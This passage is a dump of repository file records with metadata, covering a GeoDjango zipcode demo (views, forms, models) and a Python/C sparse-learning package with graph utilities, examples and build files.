ListZipcodeView.as_view(),\n name=\"list_zipcode\"),\n url(r'^delete-zipcode/(?P<pk>\\d+)/',\n ZipcodeDeleteView.as_view(),\n name=\"delete_zipcode\"),\n url(r'update-zipcode/(?P<pk>\\d+)/$',\n ZipCodeUpdate.as_view(),\n name='update_zipcode')\n ]\n" }, { "alpha_fraction": 0.6700223684310913, "alphanum_fraction": 0.6927666068077087, "avg_line_length": 31.707317352294922, "blob_id": "b18d32531a80cd1153daf288d39680a676428cde", "content_id": "970ba1af0b6400be844a556f4c0f9f6dfcdee9b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2691, "license_type": "no_license", "max_line_length": 114, "num_lines": 82, "path": "/geolocation/views.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.views\n#\n# Views correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\n\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import (\n FormView, DeleteView, UpdateView\n )\nfrom django.views.generic import ListView\n\nfrom .forms import *\nfrom .models import *\n\n\nclass RegisterPolyView(FormView):\n \"\"\"!\n Clase que controla el formulario del zipcode para el template\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n form_class = ZipcodeForms\n template_name = 'geodjango-template.html'\n success_url = '/geolocation/register-poly/'\n\n def form_valid(self, form, **kwargs):\n \"\"\"\n Funcion que valida el formulario de registro de la explicacion situacional\n @return: Dirige con un mensaje de exito a el geolocation\n \"\"\"\n new_zipcode = form.save()\n messages.success(self.request, \"ZipCode %s, registrado con exito\" % (str(new_zipcode)))\n return super(RegisterPolyView, self).form_valid(form)\n\n\nclass ListZipcodeView(ListView):\n \"\"\"\n Clase que controla el listado del zipcode\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n template_name = 'geodjango-list.html'\n paginate_by = 3\n\n\nclass ZipcodeDeleteView(DeleteView):\n \"\"\"\n Clase que controla el eliminado del zipcode\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n success_url = reverse_lazy('geolocation:list_zipcode')\n\n\nclass ZipCodeUpdate(UpdateView, SuccessMessageMixin):\n model = Zipcode\n form_class = ZipcodeForms\n success_message = 'ZipCode Actualizado con exito'\n success_url = reverse_lazy('geolocation:list_zipcode')\n" }, { "alpha_fraction": 0.5722960233688354, "alphanum_fraction": 0.6011385321617126, "avg_line_length": 37.75, "blob_id": "63956bad1c6e07001f6b408bb603672992cc0320", "content_id": "116f70ee9132b3775ae99b72b1f9b112f0cb6c59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2644, "license_type": "no_license", "max_line_length": 114, "num_lines": 68, "path": "/geolocation/forms.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geodjango.forms\n#\n# Formularios correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\n\nfrom django.contrib.gis import forms\n\nfrom .models import *\n\n\nclass ZipcodeForms(forms.ModelForm):\n \"\"\"!\n Clase que permite crear el formulario para el Zipcode\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del formulario\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n \"\"\"!\n Funcion que construye el init del formulario\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n \"\"\"\n super(ZipcodeForms, self).__init__(*args, **kwargs)\n self.fields['code'].widget.attrs.update({'class': 'form-control',\n 'placeholder': 'Zip Code'})\n self.fields['code'].label = 'Zip Code'\n self.fields['code'].required = True\n\n # Se le agrega la ruta donde se construye el mapa con el default_zoom\n self.fields['poly'].widget = forms.OSMWidget.template_name = 'openlayers-cust.html'\n\n # Se le agrega al campo los atributos que por defecto tiene la ubicacion (lat lon) de Venezuela\n # Con un zoom por defecto de 5.2 y\n # Un alto y ancho de 600X400\n self.fields['poly'].widget = forms.OSMWidget(attrs={\n 'default_zoom': 5.2, 'map_width': 600,\n 'map_height': 400, 'default_lat': 8,\n 'default_lon': -66})\n self.fields['poly'].label = 'Cordenadas Poligonales'\n self.fields['poly'].required = True\n" }, { "alpha_fraction": 0.5795981287956238, "alphanum_fraction": 0.6114373803138733, "avg_line_length": 34.5494499206543, "blob_id": "ea34206984976ce9b5ff419a8ee7090c6a9bbe53", "content_id": "53e6ee77575c3d865e13e177401ee7b7d76b68e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3247, "license_type": "no_license", "max_line_length": 114, "num_lines": 91, "path": "/geolocation/models.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.models\n#\n# Modelos correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.contrib.gis.db import models\n\n\nclass Zipcode(models.Model):\n \"\"\"!\n Clase que gestiona los datos del Zipcode\n\n @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n # Campo del ZioCode\n code = models.CharField(max_length=5)\n # Campo de la poligonal\n poly = models.PolygonField()\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del modelo\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n ordering = ('code',)\n verbose_name = 'Zipcode'\n verbose_name_plural = 'Zipcodes'\n\n def __str__(self):\n \"\"\"!\n Funcion que muestra la informacion de los Zipcodes\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @param self <b>{object}</b> Objeto que instancia la clase\n @return Devuelve los datos de la asignacion del Zipcode\n \"\"\"\n return self.code\n\n\nclass Elevation(models.Model):\n \"\"\"!\n Clase que gestiona los datos de la Elevation\n\n @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n name = models.CharField(max_length=100)\n rast = models.RasterField()\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del modelo\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n ordering = ('name',)\n verbose_name = 'Elevation'\n verbose_name_plural = 'Elevations'\n\n def __str__(self):\n \"\"\"!\n Funcion que muestra la informacion de las Elevations\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @param self <b>{object}</b> Objeto que instancia la clase\n @return Devuelve los datos de la asignacion del Elevation\n \"\"\"\n return self.name\n" } ]
6
baojianzhou/sparse-learn
https://github.com/baojianzhou/sparse-learn
9b7f08738c2d40cda3991507fe0ee3d9c2c86bc1
ed01f2c3d518c0c48652bc4fe4dc552ba3d5a427
19e40804b118779d0d773b0577791cb4e874c7c4
refs/heads/master
2020-05-19T16:25:38.023222
2019-12-20T23:16:24
2019-12-20T23:16:24
185,107,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 45, "blob_id": "f236c7211f88f092f3fab943f4507efe9288e419", "content_id": "0fcd0930522a33daaa35b14bf60d863a036255d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "permissive", "max_line_length": 55, "num_lines": 6, "path": "/sparse_learn/examples/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"examples\"\nfrom sparse_learn.examples import example_model\nfrom sparse_learn.examples import example_test_all\nfrom sparse_learn.examples import example_test_proj\nfrom sparse_learn.examples import example_graph_da\nfrom sparse_learn.examples import example_graph_sto_iht\n" }, { "alpha_fraction": 0.8191881775856018, "alphanum_fraction": 0.8191881775856018, "avg_line_length": 32.875, "blob_id": "942f42e44a233a1c6d964e913cb8f2f468e9d451", "content_id": "510c21f6aa5f04d92a533ba9c409c932d0801bb5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/sparse_learn/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"sparse_learn\"\nfrom sparse_learn import c\nfrom sparse_learn import base\nfrom sparse_learn import examples\nfrom sparse_learn import graph_utils\nfrom sparse_learn import data_process\nfrom sparse_learn import algo_graph_da\nfrom sparse_learn import algo_graph_sto_iht\n" }, { "alpha_fraction": 0.5634704828262329, "alphanum_fraction": 0.6034896969795227, "avg_line_length": 40.37748336791992, "blob_id": "ebb6689fb4d03bab84394d37d34803355a08bbc3", "content_id": "bb9b53935dfc69260b0c5f7fae3dc0768a69bc8c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6247, "license_type": "permissive", "max_line_length": 112, "num_lines": 151, "path": "/sparse_learn/examples/example_model.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport time\nimport numpy as np\nfrom sparse_learn.proj_algo import head_proj\nfrom sparse_learn.proj_algo import tail_proj\nfrom sparse_learn.fast_pcst import fast_pcst\nfrom sparse_learn.graph_utils import simu_graph\nfrom sparse_learn.graph_utils import minimal_spanning_tree\nfrom sparse_learn.proj_algo import HeadTailWrapper\n\n\ndef test_proj_algo():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. / 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. / 169., err_tol=1e-6, max_iter=30,\n root=-1, pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test2 result head nodes: ', re_nodes)\n print('test2 result head edges: ', re_edges)\n re = tail_proj(edges=edges, weights=weights, x=x, g=1, s=4, root=-1,\n max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test3 result tail nodes: ', re_nodes)\n print('test3 result tail edges: ', re_nodes)\n re = tail_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n root=-1, max_iter=20, budget=3., nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test4 result tail nodes: ', re_nodes)\n print('test4 result tail edges: ', re_nodes)\n wrapper = HeadTailWrapper(edges=edges, weights=weights)\n re = wrapper.run_head(x=x, g=1, s=4, budget=3., delta=1. / 169.)\n re_nodes, re_edges, p_x = re\n print('test5 result head nodes: ', re_nodes)\n print('test5 result head edges: ', re_nodes)\n re = wrapper.run_tail(x=x, g=1, s=4, budget=3, nu=2.5)\n re_nodes, re_edges, p_x = re\n print('test6 result tail nodes: ', re_nodes)\n print('test6 result tail edges: ', re_nodes)\n\n\ndef test_fast_pcst():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n n, m = len(weights), edges.shape[1]\n x = np.random.normal(0.0, 0.1, 25)\n sub_graph = [6, 7, 8, 9]\n x[sub_graph] = 5.\n # edges, prizes, weights, root, g, pruning, epsilon, verbose\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test7 result pcst nodes: ', re_nodes)\n print('test7 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=np.zeros(n), weights=weights, root=-1,\n g=1, pruning='gw', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test8 result pcst nodes: ', re_nodes)\n print('test8 result pcst edges: ', re_nodes)\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges = re\n print('test9 result pcst nodes: ', re_nodes)\n print('test9 result pcst edges: ', re_nodes)\n\n\ndef test_mst():\n print('-' * 100)\n edges, weights = simu_graph(25, rand=True) # get grid graph\n start_time = time.time()\n selected_indices = minimal_spanning_tree(edges=edges, weights=weights, num_nodes=25)\n print('run time:', (time.time() - start_time))\n for index in selected_indices:\n print(index, weights[index])\n selected_edges = {(i, j): None for (i, j) in edges[selected_indices]}\n import networkx as nx\n from pylab import rcParams\n import matplotlib.pyplot as plt\n from matplotlib.pyplot import subplots_adjust\n subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n rcParams['figure.figsize'] = 14, 14\n G = nx.Graph()\n for edge in edges:\n G.add_edge(edge[0], edge[1])\n pos, edge_posi = dict(), dict()\n length, width, index = 5, 5, 0\n for i in range(length):\n for j in range(width):\n G.add_node(index)\n pos[index] = (j, length - i)\n if (j, length - i) in selected_edges or (length - i, j) in selected_edges:\n edge_posi[index] = (j, length - i)\n index += 1\n nx.draw_networkx_nodes(G, pos, node_size=100, nodelist=range(length * width), node_color='gray')\n nx.draw_networkx_edges(G, pos, alpha=0.5, width=2, edge_color='r')\n plt.axis('off')\n plt.show()\n\n\ndef test_mst_performance():\n edges, weights = simu_graph(1000000, rand=True) # get grid graph\n x = np.random.normal(0.0, 0.1, 1000000)\n sub_graph = range(10000, 11000)\n x[sub_graph] = 50.\n start_time = time.time()\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes1, re_edges1 = re\n print('run time of original pcst: ', (time.time() - start_time))\n start_time = time.time()\n selected_indices = minimal_spanning_tree(edges=edges, weights=weights, num_nodes=1000000)\n print('run time of mst:', (time.time() - start_time))\n start_time = time.time()\n edges, weights = edges[selected_indices], weights[selected_indices]\n re = fast_pcst(edges=edges, prizes=x ** 2., weights=weights, root=-1, g=1,\n pruning='strong', epsilon=1e-6, verbose=0)\n print('run time of original pcst: ', (time.time() - start_time))\n re_nodes2, re_edges2 = re\n print(len(re_nodes1))\n print(len(re_nodes2))\n print(len(set(re_nodes1).intersection(re_nodes2)))\n\n\ndef test_graph_ghtp():\n x_tr = np.asarray([[1., 2., 3., 4.], [1., 2., 3., 4.], [1., 2., 3., 4.]], dtype=np.float64)\n y_tr = np.asarray([1., 1., -1.], dtype=np.float64)\n w0 = np.asarray([0., 0., 0., 0., 0.])\n lr = 0.1\n sparsity = 2\n tol = 1e-6\n max_iter = 50\n eta = 1e-3\n ghtp_logistic_py(x_tr=x_tr, y_tr=y_tr, w0=w0, lr=lr, sparsity=sparsity, tol=tol, max_iter=max_iter, eta=eta)\n\n\ndef main():\n test_graph_ghtp()\n\n\nif __name__ == '__main__':\n test_proj_algo()" }, { "alpha_fraction": 0.6168277263641357, "alphanum_fraction": 0.6225128173828125, "avg_line_length": 33.490196228027344, "blob_id": "e082f3b9d4387a81dcb60576b642997a22afd5d2", "content_id": "a2fe41fc14e29841c949296a4168fcce762dec97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1759, "license_type": "permissive", "max_line_length": 78, "num_lines": 51, "path": "/setup.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a wrapper of head and tail projection. To generate sparse_module.so\nfile, please use the following command (suppose you have Linux/MacOS/MacBook):\n python setup.py build_ext --inplace\n\"\"\"\nimport os\nimport numpy\nfrom setuptools import setup\nfrom setuptools import find_packages\nfrom distutils.core import Extension\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsrc_files = ['sparse_learn/c/main_wrapper.c',\n 'sparse_learn/c/head_tail_proj.c',\n 'sparse_learn/c/fast_pcst.c',\n 'sparse_learn/c/sort.c']\ncompile_args = ['-shared', '-Wall', '-g', '-O3', '-fPIC', '-std=c11', '-lm']\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"sparse_learn\",\n version=\"0.1.1\",\n author=\"Baojian Zhou\",\n author_email=\"bzhou6@albany.edu\",\n description=\"A package related with sparse learning methods.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n use_2to3=True,\n url=\"https://github.com/baojianzhou/sparse-learn\",\n packages=find_packages(),\n install_requires=['numpy'],\n include_dirs=[numpy.get_include()],\n headers=['sparse_learn/c/head_tail_proj.h',\n 'sparse_learn/c/fast_pcst.h',\n 'sparse_learn/c/sort.h'],\n ext_modules=[\n Extension('sparse_learn',\n sources=src_files,\n language=\"C\",\n extra_compile_args=compile_args,\n include_dirs=[numpy.get_include()])],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\", ],\n keywords='sparse learning, structure sparsity, head/tail projection')\n" }, { "alpha_fraction": 0.7109915614128113, "alphanum_fraction": 0.7263643145561218, "avg_line_length": 43.89655303955078, "blob_id": "5da06b82aaa8c7ff02b4607986ea019314de8d7b", "content_id": "39dc5a292f1423599c95dd3be108bf1660b675fe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1301, "license_type": "permissive", "max_line_length": 112, "num_lines": 29, "path": "/CMakeLists.txt", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 2.8)\ninclude_directories(sparse_learn/c/)\nproject(sparse-learn C)\n\nset(CMAKE_C_STANDARD 11)\nset(CMAKE_C_FLAGS \"-Wall -Wextra -std=c11 -O3 -fPIC\")\n\nset(PYTHON_INCLUDE \"/home/baojian/anaconda3/include/python3.7m\")\nset(NUMPY_INCLUDE \"/home/baojian/anaconda3/lib/python3.7/site-packages/numpy/core/include/\")\nset(PYTHON_LIB \"/home/baojian/anaconda3/lib/\")\n\ninclude_directories(${PYTHON_INCLUDE})\nset(C_PATH sparse_learn/c/)\nset(FAST_PCST_SRC ${C_PATH}fast_pcst.c ${C_PATH}fast_pcst.h)\nset(HEAD_TAIL_SRC ${C_PATH}head_tail_proj.c ${C_PATH}head_tail_proj.h)\nset(SORT_SRC ${C_PATH}sort.c ${C_PATH}sort.h)\n\nadd_executable(test_fast_pcst ${C_PATH}fast_pcst_test.c ${FAST_PCST_SRC})\ntarget_link_libraries(test_fast_pcst -Wall -O3 -lm)\n\nadd_executable(test_head_tail_proj ${C_PATH}head_tail_proj_test.c ${HEAD_TAIL_SRC} ${FAST_PCST_SRC} ${SORT_SRC})\ntarget_link_libraries(test_head_tail_proj -Wall -O3 -lm)\n\nadd_executable(test_sort ${C_PATH}sort_test.c ${C_PATH}sort.c ${C_PATH}sort.h)\ntarget_link_libraries(test_sort -Wall -O3 -lm)\n\nadd_library(sparse_learn SHARED ${C_PATH}main_wrapper.c ${FAST_PCST_SRC} ${HEAD_TAIL_SRC} ${SORT_SRC})\ntarget_link_libraries(sparse_learn -std=c11 -Wall -Wextra -O3\n -I${OPENBLAS_INCLUDE} -I${NUMPY_INCLUDE} -L${OPENBLAS_LIB} -lm -lpthread)" }, { "alpha_fraction": 0.6552567481994629, "alphanum_fraction": 0.6772615909576416, "avg_line_length": 50.25, "blob_id": "537fc7a9c97643cd99237f2553b3b2566e662463", "content_id": "5c2238bbfbadcb9a8abe31b992e04e3d0361b0ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 409, "license_type": "permissive", "max_line_length": 85, "num_lines": 8, "path": "/sparse_learn/c/build.sh", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "#!/bin/bash\nsort_src=\"sort.h sort.c\"\nfast_pcst_src=\"fast_pcst.h fast_pcst.c\"\nhead_tail_src=\"head_tail_proj.h head_tail_proj.c\"\nall_src=\"${sort_src} ${fast_pcst_src} ${head_tail_src}\"\ngcc -g -Wall -std=c11 -O3 ${sort_src} sort_test.c -o test_sort\ngcc -g -Wall -std=c11 -O3 ${fast_pcst_src} fast_pcst_test.c -o test_fast_pcst\ngcc -g -Wall -std=c11 -O3 ${all_src} head_tail_proj_test.c -o test_head_tail_proj -lm" }, { "alpha_fraction": 0.5758162140846252, "alphanum_fraction": 0.5878849029541016, "avg_line_length": 34.31694030761719, "blob_id": "502a12ded28c13752f80f4b72d98f840e7862213", "content_id": "8eb3b93f61acd17287e053a3f918525441880cd9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12926, "license_type": "permissive", "max_line_length": 114, "num_lines": 366, "path": "/sparse_learn/graph_utils.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__all__ = ['simu_graph', 'draw_graph', 'simu_grid_graph', 'HeadTailWrapper', 'head_proj', 'tail_proj',\n 'minimal_spanning_tree', 'random_walk', 'fast_pcst']\n\nimport random\nimport numpy as np\n\ntry:\n import c_sparse_learn\n\n try:\n from c_sparse_learn import c_proj_pcst\n from c_sparse_learn import c_proj_head\n from c_sparse_learn import c_proj_tail\n except ImportError:\n print('cannot some functions')\n exit(0)\nexcept ImportError:\n print('cannot find the package c_sparse_learn')\n\n\ndef simu_graph(num_nodes, rand=False, graph_type='grid'):\n \"\"\"\n To generate a grid graph. Each node has 4-neighbors.\n :param num_nodes: number of nodes in the graph.\n :param rand: if rand True, then generate random weights in (0., 1.)\n :param graph_type: ['grid', 'chain']\n :return: edges and corresponding to unite weights.\n \"\"\"\n edges, weights = [], []\n if graph_type == 'grid':\n length = int(np.sqrt(num_nodes))\n width, index = length, 0\n for i in range(length):\n for j in range(width):\n if (index % length) != (length - 1):\n edges.append((index, index + 1))\n if index + length < int(width * length):\n edges.append((index, index + length))\n else:\n if index + length < int(width * length):\n edges.append((index, index + length))\n index += 1\n edges = np.asarray(edges, dtype=int)\n elif graph_type == 'chain':\n for i in range(num_nodes - 1):\n edges.append((i, i + 1))\n else:\n edges = []\n\n # generate weights of the graph\n if rand:\n weights = []\n while len(weights) < len(edges):\n rand_x = np.random.random()\n if rand_x > 0.:\n weights.append(rand_x)\n weights = np.asarray(weights, dtype=np.float64)\n else:\n weights = np.ones(len(edges), dtype=np.float64)\n return edges, weights\n\n\ndef simu_grid_graph(width, height, rand_weight=False):\n \"\"\"Generate a grid graph.\n To generate a grid graph. Each node has 4-neighbors. Please see more\n details in https://en.wikipedia.org/wiki/Lattice_graph. For example,\n we can generate 5x3(width x height) grid graph\n 0---1---2---3---4\n | | | | |\n 5---6---7---8---9\n | | | | |\n 10--11--12--13--14\n by using simu_grid_graph(5, 3)\n We can also generate a 1x5 chain graph\n 0---1---2---3---4\n by using simu_grid_graph(5, 1)\n :param width: width of this grid graph.\n :param height: height of this grid graph.\n :param rand_weight: generate weights from U(1., 2.) if it is True.\n :return: edges and corresponding edge costs.\n return two empty [],[] list if there was any error occurring.\n \"\"\"\n if width < 0 and height < 0:\n print('Error: width and height should be positive.')\n return [], []\n width, height = int(width), int(height)\n edges, weights = [], []\n index = 0\n for i in range(height):\n for j in range(width):\n if (index % width) != (width - 1):\n edges.append((index, index + 1))\n if index + width < int(width * height):\n edges.append((index, index + width))\n else:\n if index + width < int(width * height):\n edges.append((index, index + width))\n index += 1\n edges = np.asarray(edges, dtype=int)\n # random generate costs of the graph\n if rand_weight:\n weights = []\n while len(weights) < len(edges):\n weights.append(random.uniform(1., 2.0))\n weights = np.asarray(weights, dtype=np.float64)\n else: # set unit weights for edge costs.\n weights = np.ones(len(edges), dtype=np.float64)\n return edges, weights\n\n\ndef random_walk(edges, s, init_node=None, restart=0.0):\n \"\"\"Random generate a connected subgraph by using random walk.\n Given a connected undirected graph (represented as @param:edges), a random\n walk is a procedure to generate a connected subgraph with s different\n nodes. Please check more details in the first paragraph of section 1.\n basic notations and facts of reference [1] in Page 3.\n Reference: [1] Lovász, László. \"Random walks on graphs: A survey.\"\n Combinatorics, Paul erdos is eighty 2.1 (1993): 1-46.\n :param edges: input graph as the list of edges.\n :param s: the number of nodes in the returned subgraph.\n :param init_node: initial point of the random walk.\n :param restart: with a fix probability to restart from the initial node.\n :return: a list of s nodes and a list of walked edges.\n return two empty list if there was any error occurring.\n \"\"\"\n adj, nodes = dict(), set()\n for edge in edges: # construct the adjacency matrix.\n uu, vv = int(edge[0]), int(edge[1])\n nodes.add(uu)\n nodes.add(vv)\n if uu not in adj:\n adj[uu] = set()\n adj[uu].add(vv)\n if vv not in adj:\n adj[vv] = set()\n adj[vv].add(uu)\n if init_node is None:\n # random select an initial node.\n rand_start_point = random.choice(list(nodes))\n init_node = list(adj.keys())[rand_start_point]\n if init_node not in nodes:\n print('Error: the initial_node is not in the graph!')\n return [], []\n if not (0.0 <= restart < 1.0):\n print('Error: the restart probability not in (0.0,1.0)')\n return [], []\n if not (0 <= s <= len(nodes)):\n print('Error: the number of nodes not in [0,%d]' % len(nodes))\n return [], []\n subgraph_nodes, subgraph_edges = set(), set()\n next_node = init_node\n subgraph_nodes.add(init_node)\n if s <= 1:\n return subgraph_nodes, subgraph_edges\n # get a connected subgraph with s nodes.\n while len(subgraph_nodes) < s:\n next_neighbors = list(adj[next_node])\n rand_nei = random.choice(next_neighbors)\n subgraph_nodes.add(rand_nei)\n subgraph_edges.add((next_node, rand_nei))\n subgraph_edges.add((rand_nei, next_node))\n next_node = rand_nei # go to next node.\n if random.random() < restart:\n next_node = init_node\n return list(subgraph_nodes), list(subgraph_edges)\n\n\ndef draw_graph(sub_graph, edges, length, width):\n \"\"\"\n To draw a grid graph.\n :param sub_graph:\n :param edges:\n :param length:\n :param width:\n :return:\n \"\"\"\n import networkx as nx\n from pylab import rcParams\n import matplotlib.pyplot as plt\n from matplotlib.pyplot import subplots_adjust\n subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n rcParams['figure.figsize'] = 14, 14\n\n G = nx.Graph()\n for edge in edges:\n 